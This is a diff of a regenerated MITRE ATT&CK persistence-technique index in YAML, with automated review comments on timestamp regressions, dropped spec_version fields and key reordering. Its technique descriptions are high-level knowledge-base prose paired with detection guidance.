description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
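Review bot: The `modified` timestamp for T1205.002 moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-10-20T19:56:18.579Z'`, and the same pattern repeats further down for T1133 (`2023-05-09` to `2023-03-30`) and T1546.006 (`2022-05-11` to `2022-04-20`). The old values all share the `T14:00:00.188Z` release-day stamp while the new ones are per-object, which suggests the previous index was built from a release-stamped bundle and this one from a source with original object timestamps. Confirm which source the generator now reads so the earlier-looking dates are understood as a source change, not as objects regressing to an older bundle; that these three objects keep `x_mitre_attack_spec_version: 2.1.0` is consistent with them being untouched upstream.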
@@ -27356,7 +27748,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
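Review bot: Here `spec_version: '2.1'` is dropped from T1205.002 while its `x_mitre_attack_spec_version: 2.1.0` and `x_mitre_modified_by_ref` are left unchanged, which shows the `spec_version` removal is a generator-side change applied to every object rather than something carried in with the updated upstream objects. Any tooling that reads `spec_version` from this index needs to be updated in the same change; consider stating the generator change in the commit message since the field disappears from every technique in the file.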
@@ -27421,49 +27812,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27478,20 +27830,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
@@ -27581,7 +27970,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27669,7 +28057,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27754,11 +28141,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27836,7 +28222,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
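Review bot: In the T1133 tail only `object_marking_refs`, the removed `spec_version: '2.1'` and `identifier: T1133` are visible; unlike every other object in this patch there is no `x_mitre_attack_spec_version` or `x_mitre_modified_by_ref` line in the surrounding context. Key order is not stable across this regeneration, so verify those two keys appear elsewhere in the T1133 object rather than being missing; an object with no attack spec version will break any consumer that branches on it.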
@@ -27869,7 +28254,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
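Review bot: T1546.006 shows the same backwards `modified` date (2022-05-11 to 2022-04-20). If the regenerated file now takes the per-object timestamp from the STIX bundle instead of a release-wide stamp, the PR description should say so, because otherwise these regressions read as stale source data.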
@@ -27892,11 +28277,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27954,9 +28338,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -28037,12 +28420,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -28061,7 +28443,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -28075,7 +28456,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -28102,8 +28482,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -28134,7 +28514,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -28191,11 +28572,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -28267,9 +28647,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -28285,12 +28665,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28365,7 +28744,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28408,7 +28786,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28432,8 +28810,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
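Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1542.005 without adding a replacement, so the object is left with no attack-spec version at all, while T1574.011 earlier in this diff has the same key re-added as `3.2.0` at the end of its block. Combined with the `modified` date of T1542.005 moving back from 2021-04-29 to 2020-10-22 in the preceding hunk, this looks like an older revision of the object was picked up; check whether `x_mitre_attack_spec_version: 3.2.0` should be present here.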
@@ -28588,31 +28964,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28629,6 +28985,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28639,9 +28996,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28649,17 +29010,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
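Review bot: `x_mitre_permissions_required: - User` is kept for T1053.003 (unchanged context in this hunk), but the same key is deleted outright for T1137 and T1137.006 later in this diff. If the generator is meant to drop that deprecated key, T1053.003 should lose it too; if not, the deletions on the other two objects need explaining. The remaining changes here (key reorder, new `revoked: false` and `x_mitre_remote_support: false`, spec bump to 3.2.0) are consistent with the other reordered objects.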
@@ -28667,79 +29048,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
